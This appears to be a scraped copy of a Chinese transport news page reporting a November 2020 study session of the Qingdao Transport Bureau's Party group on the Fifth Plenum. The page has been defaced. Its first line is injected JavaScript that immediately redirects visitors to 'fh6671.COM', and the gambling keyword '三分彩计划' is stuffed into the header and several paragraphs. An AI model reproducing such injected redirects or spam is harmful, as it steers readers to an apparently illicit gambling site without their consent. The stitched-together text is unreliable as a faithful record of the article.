function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

青岛交通召开党组理论学习中心组读书班

2020-11-17 16:02:37 来源:中国交通新闻网 作者:特约记者 杨德志

11月14日上午,山东省青岛市交通运输局主要领导李虎成主持召开局党组理论学习中心组读书班集中学习研讨,深入学习贯彻党的十九届五中全会精神。局党组成员分别作了交流发言。局机关各处室主要负责人和局直单位正处级领导干部参加集体学习。

三分彩计划会议要求,各级党组织要认真学习领会党的十九届五中全会精神,坚持把党的十九届五中全会精神作为当前和今后一个时期各项工作的重要遵循,在危机中育先机、于变局中开新局,推动交通运输事业高质量发展。

会议强调,要深刻认识我国经济社会发展新阶段带来的新机遇和新挑战,提高政治站位,坚定交通运输事业发展必须始终坚持以习近平新时代中国特色社会主义思想为指引的政治自觉,坚持党建统领,为确保五中全会精神迅速落地见效和实现“十四五”交通运输高质量发展提供政治保障,坚持学以致用,确保“十三五”圆满收官、“十四五”良好开局。一要全力推进交通强国试点集中攻坚和交通强省、交通强市建设。积极争取更多的交通强国试点任务,纳入我市“十四五”综合交通发展规划,支撑《交通强国建设纲要》落地实施,打造交通强国建设的青岛样板,建设交通强市。二要紧紧抓住“双循环”格局下重大战略机遇。充分发挥交通运输的先导性和引领性作用,放大青岛交通区位优势,深度融入“双循环”新发展格局,为行业发展拓展更大空间,再塑青岛交通发展新优势。三要加快推进交通运输基础设施建设和胶东经济圈交通一体化。着力打造“轨道上的胶东半岛”,构建便捷高效的公路网络,提升空港枢纽能级,加强港口群协作联动,优化综合交通管理服务,带动胶东经济圈构建产业共同体。四要持续推进交通创新发展。加快推进智慧高速、智慧港航、城际高铁和轨道交通、新能源汽车应用等“新基建”建设,全面提升青岛交通发展质量和效益。五要着力提升交通运输治理体系和治理能力现代化。持续深化“放管服”改革,推进政务服务流程再造,加快完善综合交通运输法规政策制度体系,提升交通运输系统治理能力。六要着力提振干部职工干事创业精神状态。以常态化“三述”“三基”、模范机关建设等为抓手,打造“三化一型”干部队伍,确保十九届五中全会部署要求在青岛交通运输系统迅速落地生根、开花结果。

三分彩计划11月11日至14日,青岛市交通运输局举办了局党组理论中心组读书班。读书班学员通过个人自学、集中学习、专家讲座和交流研讨等方式,重点学习了《习近平谈治国理政》第三卷、《习近平新时代中国特色社会主义思想学习纲要》、党的十九届五中全会精神、习近平总书记关于交通运输工作的重要指示批示精神。参加读书班的学员认真研读、深入思考、充分交流,高质量完成了学习任务,达到了预期效果。大家表示,要紧密团结在以习近平同志为核心的党中央周围,把思想和行动统一到十九届五中全会精神上来,担当作为,真抓实干,推动交通运输高质量发展,为全面建设社会主义现代化国家开好局、起好步贡献交通力量。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。